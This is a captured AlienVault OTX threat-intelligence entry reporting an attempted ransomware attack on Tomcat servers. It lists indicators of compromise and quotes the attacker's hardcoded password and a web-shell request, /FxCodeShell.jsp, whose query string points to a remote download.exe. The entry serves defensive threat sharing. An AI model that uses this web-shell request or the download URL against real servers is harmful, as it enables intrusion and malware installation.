otx.alienvault.com Open in urlscan Pro
13.32.121.24  Public Scan

Form analysis
0 forms found in the DOM

Text Content

×

   
 * Browse
 * Scan Endpoints
 * Create Pulse
 * Submit Sample
 * API Integration
   
   
 * Login | Sign Up
   

All
   
 * Login | Sign Up
   
 * 
   

Share
Actions
Subscribers (45)
Suggest Edit
Clone
Embed
Download
Report Spam



ATTEMPTED RANSOMWARE ON TOMCAT DEPLOYMENTS

   
 * Created 3 years ago by ian.oconnell.cs
 * Public
 * TLP: Green

Attempted Ransomware on Tomcat Deployments Payload attempts to identify what
Tomcat OS is running. Payload then tries to put the following password on the
temp directory: String password = "FxxkMyLie1836710Aa"; Chmod commands on files
where observed End of payload an exe file was referenced in a referrer URL
/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://cb.fuckingmy.life/download.exe


Endpoint Security
Scan your endpoints for IOCs from this Pulse!
Learn more
 * Indicators of Compromise (4)
 * Related Pulses (10)
 * Comments (0)
 * History (1)

IPv4 (2)Hostname (1)URL (1)

TYPES OF INDICATORS

Indonesia (1)China (1)

THREAT INFRASTRUCTURE

Show
10 25 50 100
entries
Search:

type

indicator

Role

title

Added

Active

related Pulses

hostnamecb.fuckingmy.lifeAug 28, 2019, 4:14:22 PM9

URLhttp://cb.fuckingmy.life/download.exeAug 28, 2019, 4:14:22 PM6

IPv460.191.75.49Aug 28, 2019, 4:14:22 PM0

IPv4180.244.239.193Aug 28, 2019, 4:14:22 PM0


SHOWING 1 TO 4 OF 4 ENTRIES


COMMENTS

You must be logged in to leave a comment.

Refresh Comments

 * © Copyright 2022 AlienVault, Inc.
   
 * Legal
   
 * Status